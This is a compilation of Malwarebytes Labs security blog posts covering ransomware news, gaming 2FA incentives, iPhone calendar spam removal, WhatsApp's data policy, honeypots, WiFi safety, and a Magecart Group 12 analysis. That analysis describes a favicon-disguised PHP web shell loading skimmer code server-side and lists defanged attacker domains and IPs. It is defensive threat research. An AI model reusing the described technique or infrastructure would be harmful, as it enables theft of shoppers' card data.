A week in security (May 10 – 16)

Last week on Malwarebytes Labs, we watched and reported on the Colonial Pipeline ransomware attack as developments of its story unfolded. This attack triggered the White House to refine a planned Executive Order on cybersecurity. We also profiled DarkSide, the ransomware responsible for the Colonial Pipeline attack, and the criminal gang behind it.

Speaking of ransomware, we spoke with Jake Bernstein, a cybersecurity and privacy attorney and our guest in the latest Lock and Code podcast episode, to talk about the legal ramifications ransomware-turned-data-breach victims may face when they have been successfully attacked.

We also highlighted “wormable” Windows vulnerabilities on last week’s Patch Tuesday updates; touched on FragAttack, a term used to describe newly found Wi-Fi vulnerabilities that basically affects all Wi-Fi devices; addressed the question “Why MITRE ATT&CK matters”; warned about Avaddon, a new ransomware campaign; raged about WhatsApp call and message features breaking unless you share data with Facebook; applauded game developers who included cybersecurity as part of the whole gaming experience, and went “ooh!” at a novel way someone can exfiltrate data out of air-gapped networks using iPhones and AirTags.

Our expert threat hunters also noted the increase in iPhone spam attacks and observed Magecart Group 12 continuing to go strong and using a PHP-based skimmer as a new tool.

Lastly, we talked about Wi-Fi and honeypots.

Other cybersecurity news

  • The group behind the Colonial Pipeline attack claimed to be behind the Toshiba attack and data breach. (Source: Kyodo)
  • DarkSide also netted Benntag, a chemical distribution company, and got paid for it—to the tune of $4.4M USD. (Source: BleepingComputer)
  • Imposter Amazon robocalls are reaching 150 million consumers per month, according to YouMail. (Source: PR Newswire)
  • Threat actors take advantage of routine site maintenance to get people to download malformed copies of MSI Afterburn from fake website. (Source: MSI News)
  • According to a report from Immersive Labs, 81 percent of software developers have knowingly released applications that are vulnerable. (Source: Immersive Labs)
  • Panda, a new information stealer, could nab account credentials of NordVPN, Telegram, Discord, and Steam users. It also goes after cryptocurrency wallets. (Source: The Coin Radar)
  • A report on TeaBot, an new Android malware targeting European banks, was released. (Source: Cleafy)
  • Users are at risk as they continue to use Windows 7, which has already reached its end of life. (Source: Security Brief)

Stay safe!

The post A week in security (May 10 – 16) appeared first on Malwarebytes Labs.

Gamers level up with rewards for better security

There was a time when stolen gaming accounts were almost treated as a fact of life. Console hacks weren’t taken particularly seriously. Security research in this area was occasionally derided as unimportant or trivial. Gaming accounts had an essence of innate disposability to them, even if this wasn’t the case (how disposable is that gamertag used to access hundreds of dollars worth of gaming content)?

These days, gaming security is taken very seriously indeed. The gradual roll-out of Two-factor Authentication (2FA) across both gaming platforms and titles themselves is a wonderful thing, but one worries about buy-in. When sign-up rates for something as common as Google accounts are struggling to hit double figures, it’s definitely a concern.

Customer support: compromised accounts all the way down

There’s also the impact on publisher bottom lines. More stolen accounts means more time tying up customer support lines. If the victims of the stolen accounts have invested lots of money into a title, there’s the possibility of bad press should it get that far. Forgotten passwords will tie up support’s time, for sure. But the moment someone calls through with one single account compromise, the customer service rep has no idea what they’re walking into.

It could be a fairly straightforward phish. Alternatively, someone may have imitated a game developer on a Twitch stream. Did the attacker bypass text-based 2FA by social engineering the mobile provider? Perhaps the victim fell for bogus loot crates via a YouTube video. Fake game developers sending private messages? You bet.

The possibilities are endless, and also potentially endlessly time consuming.

The digital expansion of gaming

Games haven’t been a one-purchase-and-done procedure for a long time. Downloadable content, expansions, and the concept of “Games as a Service” mean content can flow forevermore. This is particularly true in the realm of Massively Multiplayer titles. It’s not uncommon for the most popular games to keep on trucking for a decade or longer. These titles offer a variety of payment options.

Some games are a one-off payment with paid-for expansions down the line. Others might have a free-to-play option, with subscription accounts for more features and content access. A few mix all of these approaches, and there’s really no set standard.

When roleplaying sets the stage for security

MMORPGs are one online realm where security has been a big part of the overall package for years. Developers had the foresight to realise account protection would become increasingly important over time. World of Warcraft developers Blizzard released their first authenticator way back in 2009. People are often surprised when they find out how long WoW has had authentication in place. Yes, this may well be something of an outlier. They’ve also run into occasional issues with people trying to bypass the system.

Even so, this is probably one of the ways mainstream gamers run into this kind of authentication for the very first time. When the biggest organisations in a space use this tech, it hopefully encourages other companies to consider doing the same thing. In 2018, they were offering backpack upgrades for anybody using authentication and their SMS Protect service.

An increasingly valuable treasure chest

What I’m fascinated by is MMORPGs with frequently expensive in-game items bought with real money. Those in-game stores often offer premium items, and it can quickly turn into an expensive hobby. Some items are cosmetic, some give in-game benefits which can occasionally turn into “pay to win” accusations.

However you stack it up, accounts with lots of purchases are incredibly valuable targets. Going back to what I said earlier, the last thing Big Game Company Inc needs is a ton of bad press where they weren’t seen to be helping “premium” gamers. They also don’t want support channels flooded with stolen account calls.

In 2012, Steam encouraged users to enable Steam Guard in return for a badge during a community event. In 2015, they took this one step further and offered sale discounts.

A few months prior to this, MMORPG developers were already gamifying 2FA and offering rewards for enabling it. ArenaNet, developers of Guild Wars 2, were handing out a cool looking dragon for enabling 2FA. Here’s another game from 2015, Wakfu, which seems to have given small stat bonuses for using their 2FA system.

The security problems facing game developers

I’m not sure if 2015 was some sort of specific flashpoint for “everybody start using this, please” but clearly the groundwork was being laid. Due to a lot of videogame reporting being lost to the ages via link rot, I’m also uncertain if games using 2FA years prior to this offered up incentives for using it. I would assume quite a few of the older titles would say the incentive was simply “not losing your account”. Perhaps this is one reason why uptake is low. After all, people are complaining about the hassle of having to use it despite freebies on the Wakfu forums.

With this in mind, what we have is:

  • Users reluctant to use the tech
  • Depending on game, a potentially very young audience who may not want the hassle of setting up 2FA
  • Accounts in use for long periods of time, with significant years of purchases behind them

This is clearly not ideal. As a result, gamifying the overall approach and offering up perks and items is the way to go.

Some current examples of security bonuses

Black Desert Online

A few months ago, the incredibly popular MMORPG Black Desert Online ran a “security campaign” event. If players set up a OTP (one time password) process for their logins, they were rewarded with a 7-day value pack. These value packs are incredibly useful for BDO players. They grant significant boosts for loot collection, buffs, inventory, storage, weight limit, marketplace sales, and much more.

If you’re even a semi-serious BDO player, these are prized items and you’ve likely bought quite a few, or grinded out events to get some for free. The alternative is paying for a variety of different Value Packs in the game’s Pearl Store via real money transactions. Although the event is now over, I’d be surprised if it doesn’t get another outing.

Star Wars: The Old Republic

This Bioware / EA juggernaut has been around for a few years and shows no signs of slowing down. It’s essentially free to play, but with various restrictions applied unless you purchase a subscription. It also contains an in-game store which offers up cosmetics, items, large scary animals which you can ride around on, the works.

I’ve played quite a few MMORPGs where large store purchases are involved, yet there often seems to be a lack of additional security to help keep accounts secure in some titles. That’s not the case here, as we’ll see.

The basic rule with premium stores is, everything is pretty expensive. There may be essential items like storage capacity or crafting bags hidden behind paywalls. You might be able to buy a house for cheap, but then you have to spend a lot more money to fill it with items or even unlock different rooms.

Developers really want you to feel that premium, exclusive angle on every purchase you make. As a result, anything given away for free in many games is often not very good. You’ll almost never get any of those premium items for free unless it’s during a special event.

Items are usually purchased with special forms of in-game currency. That is usually bought via a gaming platform for real money. In Star Wars: The Old Republic, this currency is called Cartel Coins. Developers don’t give premium store funds away for free, because that wouldn’t make any sense.

And yet.

One of the big pulls for setting up 2FA with the game’s dedicated authenticator app, is indeed free premium currency. As a bonus for setting up the app, gamers are rewarded with 100 Cartel Coins a month. That’s 1,200 coins every year the app is ticking over, which is certainly enough to buy an item or two a month, or one of the bigger discounted bundles when the player breaks the 1,000 barrier.

I’m not sure if this giveaway approach is something which coincided with the release of the app, or an additional perk which came later. As far as encouraging players to make use of additional security features, I’d give this effort 10/10.

Final Fantasy Online

Square Enix are big on One Time passwords. They use various options like physical security tokens or software authentication to get the lockdown job done. Their in-game reward is free teleportation. Many MMORPGs charge nominal amounts to fast travel, which adds up very quickly. This is a fantastic way to get buy-in from an MMORPG audience.

Gaming platform account bonuses

It’s not just individual games handing out the freebies. Gaming platforms like the Epic Store are getting in on the act too. In 2018, if you added 2FA to your Epic Games account, you received a free skin.

This may not sound like much but trust me, kids love free gaming skins.

As of 2019, the offer had broadened out considerably. In addition to a skin, players also received armory slots, backpack slots, and a free legendary troll stash Llama because hey, why not.

Interestingly, the 2FA reward program isn’t just limited to platform logins and Fortnite. If you want to keep claiming the endless selection of free titles offered on the Epic Store, you now need 2FA up and running. No additional security? No free games.

This is smart in a realm where Steam arguably still rules the roost in terms of most established PC gaming platform. By carving out chunks of the Epic Store’s most impressive platform offerings and placing them behind good security practices, the pull factor is no doubt strong. There have to be a good chunk of Epic users now sporting much better protected accounts, and that’s a win-win.

Closing thoughts

While some gamers will quibble about the value of giveaways on some titles, ultimately the devs are doing them a favour. When the worst case scenario is “You don’t lose your account to compromise”, that sounds like a pretty good deal to me. Receiving some free goodies to feed back into your gameplay loop is the icing on the cake. An easy win for everybody apart from account thieves is surely the best Game Over screen we can hope for.

The post Gamers level up with rewards for better security appeared first on Malwarebytes Labs.

iPhone calendar spam attacks on the rise

Recently, we have seen an increasing number of reports from iPhone users about their calendars filling up with junk events. These events are most often either pornographic in nature, or claim that the device has been infected or hacked, and in all cases they contain malicious links. This phenomenon is known as “calendar spam.”

Calendar spam became a big problem for Apple’s iCloud calendars back in 2016. At that time, Apple put some protections in place on iCloud to prevent these issues. Whatever they did was working, up until recently. Let’s take a look at how the scammers have changed their tactics.

Fake captcha page example

Users will encounter a scam web page like the following one (though this is just an example). These pages are reached via a number of techniques, including malvertising, compromised WordPress sites, and Search Engine Optimization (SEO) tricks. In this case, the page displays a fake captcha that users are expected to tap in order to prove they’re not a bot.

Fake captcha web page

For this particular page, tapping the “I’m not a robot” box (or, really, anywhere else on the page) results in a prompt attempting to trick the user into subscribing to a calendar.

iOS alert to obtain consent to add the calendar

Normally, this prompt would ask the user if they want to subscribe to a particular calendar by name. In this case, the scammers have given the calendar a name containing whitespace and the “Tap OK to Continue” / “Tap Cancel to Close Browser” message. Clicking Cancel will return you to the page, and if you do this a couple times, you’ll trigger a redirect. (More on that shortly.)

Clicking OK results in the spam calendar, and all its events, being added to the user’s Calendar app. These events all have alerts that cause notifications to appear in the Notification Center. Tapping a notification will take you into Calendar, which will display the content of the event. In all cases, the content is a scam message trying to get you to open a link.

Details from a spam calendar event, reading "A suspicious program may be using 90% of your memory"

At this time, the links go to a 404 page, but we believe they would have linked out to apps in Apple’s App Store.

Redirects to “security” apps

Whether you do or don’t subscribe to the calendar, the page will go back to the fake captcha. Tapping the captcha a second time, and clicking either OK or Cancel, will result in your browser being redirected to a scam page claiming your iPhone is infected or that hackers are watching you.

A scam web page titled "Hackers are watching you!"
A scam web page titled "WARNING! Your Apple iPhone is severely damaged by 13 viruses!"

These pages will redirect to a variety of App Store apps. Mostly, these are junk VPNs or supposed security apps. They mostly have high ratings, and have been around for 4+ years, but the total number of ratings given is low. This could be an indication that the ratings have been reset periodically.

Worse, many of these apps have high price, short duration subscriptions. In most cases, prices are around $8.99 or $9.99 per week.

App Store page for Guard Coil VPN

Removing the subscribed calendar(s)

If you have been impacted, your iPhone has fortunately not actually been hacked or infected (regardless of what the messages claim), and there is a simple solution. You can just delete the subscribed calendars.

First, open your Calendar app, and then tap the Calendars button at the bottom center of the screen, shown below.

iOS Calendar app showing spam events

This will result in seeing a view like the following, showing all the calendars loaded on your iPhone. Note the odd item with a green tick and no title, under the heading “SUBSCRIBED”.

The listing of all calendars shown in the Calendar app

The calendar name appears blank here, but that may not be true in every case. You’ll want to remove all subscribed calendars, except those that you are certain are legitimate. To do this, tap the button showing the letter i in a circle next to the subscribed calendar. (If you have more than one, you’ll have to repeat for each one.)

On the next screen, tap the Delete Calendar button at the bottom of the screen. (On some devices, you may have to scroll down to see it.)

Information about the unwanted calendar, including a Delete Calendar button

How to prevent the issue

First and foremost, if you find yourself seeing a strange message in Safari on your iPhone, don’t believe it, and don’t do what it tells you to do. Don’t click any buttons consenting to whatever the site is asking, such as OK, Allow, Install, etc. If you can close the tab or navigate to another page in the browser, do so. If an alert is preventing that, click Cancel if that’s an option.

If there is an alert preventing you from taking action until you tap a button, and you don’t know what to do, just restart your iPhone.

You can also use the Web Protection feature in Malwarebytes Security for iOS. This should prevent you from visiting malicious pages in Safari. Of course, as with all things, nothing is infallible, so if you find that a malicious site has slipped past, please copy the address of the page from Safari’s address bar and submit it via a support ticket to Malwarebytes support. A screenshot would help as well.

Unfortunately, since users are essentially consenting to this scam via existing Apple-provided mechanisms for obtaining consent, there may not be much that Apple can do to stop this particular wave of calendar spam. However, we’ve notified Apple anyway, and hope it can at a minimum take action against the apps promoted by these scams.

What about other platforms?

Although we’re seeing a lot of this on iOS right now, the scam affects other platforms as well. On macOS, for example, it will attempt to add a calendar, though the process is far less convincing.

macOS alert asking the user to consent to subscribe to a calendar

The same is also true on Windows.

Windows alert asking the user to choose an app to open a webcal link with

You may also be offered a browser extension by some variants of this scam, depending on your browser. (Google Chrome is a common target.)

Regardless of the platform, if you see something odd like this in the browser, do not allow it, and close the page.

The post iPhone calendar spam attacks on the rise appeared first on Malwarebytes Labs.

WhatsApp calls and messages will break unless you share data with Facebook

WhatsApp told users last week that there was no need for alarm regarding an upcoming privacy policy deadline, as users who refuse to accept the privacy policy will not have their accounts deleted—they will just have their apps rendered useless, eventually incapable of receiving calls and messages.

The planned removal of core features represents a stunning reversal for a company that long ago prioritized data privacy, transforming WhatsApp’s offering into an unworkable contradiction: Private messaging only for those who surrender a separate piece of their privacy.

At issue is WhatsApp’s 2021 privacy policy, which users first learned about in January. According to notifications sent at that time, WhatsApp began asking users to agree to share some of their data with WhatsApp’s parent company—Facebook—by a February 8 deadline.

That data does not include the content of any WhatsApp user’s messages or calls, as the company’s end-to-end encryption remains intact, and WhatsApp has repeatedly promised that its message security will not be compromised. However, the data does include interactions that users have with certain businesses over WhatsApp. And, per the new privacy policy, the entities at Facebook that will have access to that data include Facebook itself, Facebook Payments, Facebook Technologies, Onavo, and CrowdTangle.

The January notifications released a user avalanche, with many people ditching the service to install a separate, private messaging app called Signal. According to a report from TechCrunch, in just five days in January, the rival private messenger was downloaded more than 7.5 million times—growing its overall userbase at the end of 2020 by more than one third. Similar, meteoric growth was enjoyed by another private messaging app, Telegram.

But to hear WhatsApp tell the story, users got the wrong impression about the 2021 privacy policy update. The company tried to explain to some news outlets that the changes were not as dramatic as many had interpreted because the changes were not even new.

They had been in place since 2016.

According to reporting from Wired, in August of 2016, WhatsApp quietly updated its data sharing practices with Facebook:

“Under the new user agreement, WhatsApp will share the phone numbers of people using the service with Facebook, along with analytics such as what devices and operating systems are being used,” Wired wrote at the time. “Previously, no information passed between the two, a stance more in line with WhatsApp’s original sales pitch as a privacy oasis.”

Those changes came with an opportunity for then-existing WhatsApp users to opt out of the impact of that data sharing, but every new WhatsApp user who installed the app after those 2016 changes received no such option. Some of their data, according to Wired, was automatically sent to Facebook per WhatsApp’s new rules.

Technically, then, WhatsApp was right: Users misunderstood the January 2021 privacy policy notifications. There were no dramatic shifts to how WhatsApp would share data with Facebook, just minor changes to how WhatsApp will handle and share businesses-related interactions.

But those explanations did not sit right with users, security researchers, or digital rights activists.

As Matthew Green, cryptographer and professor at Johns Hopkins University, told Wired:

“WhatsApp is great for protecting the privacy of your message content. But it feels like the privacy of everything else you do is up for grabs.”

Gennie Gebhart, the acting director of activism at Electronic Frontier Foundation, also criticized WhatsApp’s unclear messaging in January.

“WhatsApp’s obfuscation and misdirection around what its various policies allow has put its users in a losing battle to understand what, exactly, is happening to their data,” Gebhart wrote.

The public blowback caused WhatsApp to postpone its initial February 8 deadline to May 15, and in the weeks in between, many users feared that the company would simply delete their accounts if they refused to accept the updated privacy policy.

But last week, WhatsApp clarified that “no one will have their accounts deleted or lose functionality of WhatsApp” on May 15 because of their choices to refuse to accept the new privacy policy.

Unfortunately, the alternative is nearly as harsh.

For WhatsApp users who decline to have their data shared with Facebook, WhatsApp will steadily remove core features, beginning with the option to view chat lists, and ending with the inability to even receive calls or messages on WhatsApp.

WhatsApp said that it has warned users about its new data policy agreement for weeks now. For users who do not agree to the privacy policy changes by May 15, WhatsApp said that “after a period of several weeks” the notification they’ve received will become persistent. At that point, WhatsApp said it will dole out consequences.

The company said:

“At that time, you’ll encounter limited functionality on WhatsApp until you accept the updates. This will not happen to all users at the same time.

You won’t be able to access your chat list, but you can still answer incoming phone and video calls. If you have notifications enabled, you can tap on them to read or respond to a message or call back a missed phone or video call.

After a few weeks of limited functionality, you won’t be able to receive incoming calls or notifications and WhatsApp will stop sending messages and calls to your phone.”

What message are users supposed to take from these limitations other than the fact that WhatsApp simply does not want users who refuse to share their data with Facebook? A private messaging app that cannot receive messages is useless, and it is ludicrous that the reason it is useless is because the company has chosen to make it that way.

This is an anti-privacy choice. It is also an anti-user choice, as users are being punished for their refusal to share data. And, finally, it is a sad but expected turn for WhatsApp, a former privacy darling launched by two co-founders—Jan Koum and Brian Acton—who both seemingly regret selling their company to Facebook for billions of dollars.

That sale in 2014 startled many users, as the two companies—one, a steadily-growing advertising giant, the other led by a man whose motto was reportedly “no ads, no games, no gimmicks”—were diametrically opposed. At the time, Koum tried to calm those fears, saying that “if partnering with Facebook meant that we had to change our values, we wouldn’t have done it.”

Four years later, Koum left. His co-founder, Acton, had left the year prior.

In an exclusive interview with Forbes, Acton explained his departure. Much of it was due to conflicting ideas on privacy.

“At the end of the day, I sold my company. I sold my users’ privacy to a larger benefit. I made a choice and a compromise,” Acton said. “And I live with that every day.”

In 2018, Acton donated $50 million to a familiar cause with a different name: the development of Signal.

The post WhatsApp calls and messages will break unless you share data with Facebook appeared first on Malwarebytes Labs.

What is a honeypot? How they are used in cybersecurity

Cybersecurity experts strive to enhance the security and privacy of computer systems. Quietly observing threat actors in action can help them understand what they have to defend against. A honeypot is one such tool that enables security professionals to catch bad actors in the act and gather data on their techniques. Ultimately, this information allows them to learn and improve security measures against future attacks.

Definition of a honeypot

What does “honeypot” mean in cybersecurity? In layman’s terms, a honeypot is a computer system intended as bait for cyberattacks. The system’s defenses may be weakened to encourage intruders. While cybercriminals infiltrate the system or hungrily mine its data, behind the smokescreen, security professionals can study the intruder’s tools, tactics and procedures. You might think of it as laying a trap for someone you know is coming with bad intentions and then watching their behavior so you can better prepare for future attacks.

Types of honeypots

In the world of cybersecurity, a honeypot appears to be a legitimate computer system, while the data is usually fake. For example, a media distribution company may host a bogus version of a film on a computer with intentional security flaws to protect the legitimate version of the new release from online pirates.

There are several different types of honeypots. Each has its own set of strengths. The kind of security mechanism an organization uses will depend on their goals and the intensity of threats they face.

Low-interaction honeypots

A low-interaction honeypot offers hackers emulated services with a narrow level of functionality on a server. The objective of this trap is usually to learn an attacker’s location and nothing more. Low-interaction honeypots are low-risk, low-reward systems.

High-interaction honeypots

Unlike the low-interaction variety, a high-interaction honeypot offers a hacker plenty to do on a system with few restrictions. This high-interaction ploy aims to study a threat actor for as long as possible and gather actionable intelligence.

Email traps

Technology companies use email traps to compile extensive deny lists of notorious spam agents. An email trap is a fake email address that attracts mail from automated address harvesters. The mail is analyzed to gather data about spammers, block their IP addresses, redirect their emails, and help users avoid a spam trap.

Decoy database

A SQL injection is a code injection procedure used to attacks databases. Network security experts create decoy databases to study flaws and identify exploits in data-driven applications to fight against such malicious code.

Spider honeypot

A spider honeypot is a type of honeypot network that consists of links and web pages that only automated crawlers can access. IT security professionals use spider honeypots to trap and study web crawlers in order to learn how to neutralize malicious bots and ad-network crawlers.

Malware honeypot

A malware honeypot is a decoy that encourages malware attacks. cybersecurity professionals can use the data from such honeypots to develop advanced antivirus software for Windows or robust antivirus for Mac technology. They also study the malware attack patterns to enhance malware detection technology and thwart malspam like GuLoader and the like.

Pros and cons of honeypot use

Although there are many benefits of honeypots, they can also backfire if they fail to cage their prey. For example, a skilled hacker can use a decoy computer to their advantage. Here are some pros and cons of honeypots:

Benefits of using honeypots

  • They can be used to understand the tools, techniques and procedures of attackers.
  • An organization can use honeypots to ascertain the skill levels of potential online attackers.
  • Honeypotting can help determine the number and location of threat actors.
  • It allows organizations to distract hackers from authentic targets.

Dangers and disadvantages of using honeypots

  • A clever hacker may be able to use a decoy computer to attack other systems in a network.
  • A cybercriminal may use a honeypot to supply bad intelligence.
  • Its use can result in myopic vision if it’s the only source of intelligence.
  • A spoofed honeypot can result in false positives, leading IT professionals on frustrating wild goose chases.

While there are pros and cons, careful and strategic use of a honeypot to gather intelligence can help a company enhance its security response measures and stop hackers from breaching its defenses, leaving it less vulnerable to cyberattacks and exploits.

The post What is a honeypot? How they are used in cybersecurity appeared first on Malwarebytes Labs.

Newly observed PHP-based skimmer shows ongoing Magecart Group 12 activity

This blog post was authored by Jérôme Segura

Web skimming continues to be a real and impactful threat to online merchants and shoppers. The threat actors in this space greatly range in sophistication from amateurs all the way to nation state groups like Lazarus.

In terms of security, many e-commerce shops remain vulnerable because they have not upgraded their content management software (CMS) in years. The campaign we are looking at today is about a number of Magento 1 websites that have been compromised by a very active skimmer group.

We believe that Magecart Group 12, identified as being behind the Magento 1 hacking spree last fall, continues to distribute new malware that was observed by security researchers recently. These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online stores. This technique is interesting as most client-side security tools will not be able to detect or block the skimmer.

Web shell hidden as favicon

While performing a crawl of Magento 1 websites, we detected a new piece of malware disguised as a favicon. The file named Magento.png attempts to pass itself as ‘image/png’ but does not have the proper PNG format for a valid image file.

The way it is injected in compromised sites is by editing the shortcut icon tags with a path to the fake PNG file. Unlike previous incidents where a fake favicon image was used to hide malicious JavaScript code, this turned out to be a PHP web shell.

Web shells are a very popular type of malware encountered on websites that allow an attacker to maintain remote access and administration. They are typically uploaded onto a web server after exploitation of a vulnerability (i.e. SQL injection).

To better understand what it does, we can decode the reverse Base64 encoded blurb. We see that it is meant to retrieve data from an external host at zolo[.]pw.

Further looking into the m1_2021_force directory reveals additional code very specific to credit card skimming.

The data exfiltration part matches what researcher Denis @unmaskparasites had found back in March on WordPress sites (Smilodon malware) which also steals user credentials:

A similar PHP file (Mage.php) was reported by SanSec as well:

That same path/filename was previously mentioned by SanSec during the Magento 1 EOL hacking spree:

This hints that we are possibly looking at the same threat actors then and now, which we can confirm by looking at the infrastructure being used.

Magecart Group 12 again

Because we found the favicon webshells on Magento 1.x websites we thought there might be a tie with the hacking that took place last year when exploits for the Magento 1 branch (no longer maintained) were found. RiskIQ documented these compromises and linked them with Magecart Group 12 at the time.

The newest domain name we found (zolo[.]pw) happens to be hosted on the same IP address (217.12.204[.]185) as recaptcha-in[.]pw and google-statik[.]pw, domains previously associated with Magecart Group 12.

There is a lot of publicly documented material on the activities of Group 1 also known for their ‘ant and cockroach‘ skimmer, their decoy CloudFlare library or their abuse of favicon files.

Dynamically loaded skimmer

There are a number of ways to load skimming code but the most common one is by calling an external JavaScript ressource. When a customer visits an online store, their browser will make a request to a domain hosting the skimmer. Although criminals will constantly expand on their infrastructure it is relatively easy to block these skimmers using a domain/IP database approach.

In comparison, the skimmer we showed in this blog dynamically injects code into the merchant site. The request to the malicious domain hosting the skimming code is not made client-side but server-side instead. As such a database blocking approach would not work here unless all compromised stores were blacklisted, which is a catch-22 situation. A more effective, but also more complex and prone to false positives approach, is to inspect the DOM in real time and detect when malicious code has been loaded.

We continue to track this campaign and other activities from Magecart Group 12. Online merchants need to ensure their stores are up-to-date and hardened, not only to pass PCI standards but also to maintain the trust shoppers place in them. If you are shopping online it’s always good to exercize some vigilance and equip yourself with security tools such as our Malwarebytes web protection and Browser Guard.

References

https://blog.group-ib.com/btc_changer

https://twitter.com/unmaskparasites/status/1370579966069383168?s=20

https://twitter.com/sansecio/status/1367404202461450244?s=20

https://twitter.com/unmaskparasites/status/1234917686242619393?s=20

https://community.riskiq.com/article/fda1f967

https://blog.sucuri.net/2020/04/web-skimmer-with-a-domain-name-generator.html

https://sansec.io/research/cardbleed

https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/

Indicators of Compromise

facedook[.]host
pathc[.]space
predator[.]host
google-statik[.]pw
recaptcha-in[.]pw
sexrura[.]pw
zolo[.]pw
kermo[.]pw
psas[.]pw
pathc[.]space
predator[.]host
gooogletagmanager[.]online
imags[.]pw
y5[.]ms
autocapital[.]pw
myicons[.]net
qr202754[.]pw
thesun[.]pw
redorn[.]space
zeborn[.]pw
googletagmanagr[.]com
autocapital[.]pw
http[.]ps
xxx-club[.]pw
y5[.]ms

195[.]123[.]217[.]18
217[.]12[.]204[.]185
83[.]166[.]241[.]205
83[.]166[.]242[.]105
83[.]166[.]244[.]113
83[.]166[.]244[.]152
83[.]166[.]244[.]189
83[.]166[.]244[.]76
83[.]166[.]245[.]131
83[.]166[.]246[.]34
83[.]166[.]246[.]81
83[.]166[.]248[.]67

jamal.budunoff@yandex[.]ru
muhtarpashatashanov@yandex[.]ru
nikola-az@rambler[.]ru

The post Newly observed PHP-based skimmer shows ongoing Magecart Group 12 activity appeared first on Malwarebytes Labs.

What does WiFi stand for?

We use WiFi to connect to the Internet, but what is it, and what does it stand for? How does it have such a catchy name, and why do we sometimes have a weak Internet connection with a strong WiFi signal and vice versa? Read on to answer these questions and more.

What does WiFi mean?

Many people assume that WiFi is short for “wireless fidelity” because the term “hi-fi” stands for “high fidelity.” Some members of the WiFi Alliance, the wireless industry organization that promotes wireless technologies and owns the trademark, may even have encouraged this misconception.

The reality is that WiFi is a made-up marketing term that doesn’t really stand for anything. The Alliance tasked marketing company Interbrand with creating a palatable term that they could trademark because “Institute of Electrical and Electronics Engineers (IEEE) wireless communication standard 802.11 technology” doesn’t quite roll off the tongue.

How does WiFi work?

In a nutshell, WiFi is a wireless network that allows wireless-capable devices like computers, tablets, smartphone, modems, microwaves, fridges, and routers to connect with each other through radio frequency signals. Any suitably equipped device can connect to a WiFi network, regardless of whether it, or the network its connecting to, have an Internet connection or not.

What is the difference between WiFi and Internet? Can you have WiFi without Internet?

Your computer can communicate with your router through a WiFi signal (or a cable) even if your router isn’t online. That’s why you can have a strong WiFi signal with a weak or nonexistent Internet connection. Similarly, your Internet router can have a healthy Internet connection which feels like it’s slow to you, because of a less than ideal WiFi signal between you and your router.

How did WiFi become an official standard?

Until 1997, the world couldn’t quite agree on a common and compatible WiFi standard. Then, a group of industry experts formed a committee to decide. Think of them like the council from Lord of the Rings but tech-savvy and with less pointy ears.

Not only did the committee agree on a wireless communication standard, but they formed an alliance called the Wireless Ethernet Compatibility Alliance (WECA). In 2002, WECA was rebranded to WiFi Alliance, which features hundreds of renowned member companies today. Pointy ears still isn’t a requirement for joining.

What is a WiFi hotspot?

A WiFi hotspot is any physical location where a device can connect to the Internet through a Wireless Local Area Network (WLAN). Nowadays, you can easily create a WiFi hotspot with a modern smart device. For example, most smartphones can produce a WiFi hotspot, which effectively turns them into an Internet-connected WiFi router. Any wireless-capable device in range can use it to connect to the Internet (using the phone’s connection to the cellular network) in the same way as they would use an Internet router at home.

When is it safe to use WiFi?

A WiFi connection’s safety depends on its security settings and the source of the WiFi connection. In public, using shared WiFi carries risks (more on that below). If you have to use public WiFi hotspots, it’s wise to also use a VPN to keep your activity private while you use that connection.  A VPN wraps your network traffic (including web browsing, email, and other things) in a protective tunnel and makes up for any weaknesses in their encryption.

For home WiFi, here are some tips that can help you improve your network security settings:

  • Update your router’s firmware to the latest version to patch any vulnerabilities.
  • Use a modern router if you can because an old router can be a security risk.
  • Change the default SSID to a different WiFi network name. A hacker can sometimes determine the make and model of your router from the SSID and use the information to exploit known weaknesses and breach your network.
  • Use the latest version of your WiFi Protected Access (WPA) protocol to enhance security. It’s advisable to avoid using the Wired Equivalent Privacy (WEP) algorithm because it’s outdated and easier to crack.
  • Enable your router and operation system’s respective firewalls to raise a network barrier that monitors traffic.
  • Set a long password for your router and your WiFi network. Always change default passwords.

How can I enhance my WiFi signal?

The strength of your WiFi signal depends on the distance between your router and your device, what’s between them, and other radio interference. Of course, it’s not always possible to keep your device near your router. That’s why it’s a good idea to keep your router in a central location in your home, away from impediments.

You can also purchase a range extender to improve your WiFi signal across your home or buy a more technologically advanced router.

Is it unsafe to use public WiFi connections?

Public WiFi connections are undoubtedly convenient. When you’re on the move, you can connect to the Internet at the airport, shopping mall, café, or restaurant through a public WiFi connection. However, many public networks are unsecured, to make it easy for people to connect. It is also impossible to tell who is operating the hotspot and whether they are benign, malicious or careless.

Because they are a bottleneck to lots of traffic, WiFi hotspots create an ideal place for committing identity theft, financial fraud, and other cybercrimes. Here are some common public WiFi attacks you should watch out for:

  • Person-in-the-middle attack: Hackers intercept communications on a public WiFi network and modify them to steal sensitive data like credit card data, emails, messages, pictures, and videos, or to inject or malicious code . This attack has also been known as a Man-in-the-Middle or MitM attack.
  • Fraudulent Hotspot: A hacker may create a compromised WiFi network with a plausible name (perhaps the same name as an existing hotspot that’s very popular) to trick users into connecting to the fake network. The hacker can use it to conduct a person-in-the-middle attack, or deploy malicious code like the new AgentTesla variant into the devices connected to the fraudulent hotspot.

How to reduce public WiFi security risks

Although the encryption that is widely used in web browsing and email delivery will help protect you from attacks, it isn’t perfect and isn’t used everywhere. It can be hard to see when it isn’t used, where it’s weak, or where it might be vulnerable to downgrade attacks, particularly in mobile apps, all of which can be exploited by attackers.

You can also use a Virtual Private Network (VPN) to secure your traffic when using public WiFi connections. By wrapping your imperfectly-encrypted traffic in a single, impenetrable tunnel, the best VPN services will keep your data safe from rogue WiFi hotspots and attempts to intercept your communications. You can also read up on VPN protocols to learn about how they secure your connection.

A top VPN service also protects your privacy by cloaking your IP address. Privacy threats can sometimes come from unlikely sources. For example, a Dutch city was recently fined for trailing its citizens with a WiFi tracking system.

Turn WiFi off on your devices when you don’t need them. It’ll make your battery last longer and it stops your device being used as a tracking beacon.

The post What does WiFi stand for? appeared first on Malwarebytes Labs.

Using iPhones and AirTags to sneak data out of air-gapped networks

Someone has found an extraordinary way to exfiltrate data by piggybacking data on the backs of unsuspecting iPhones.

Say what?

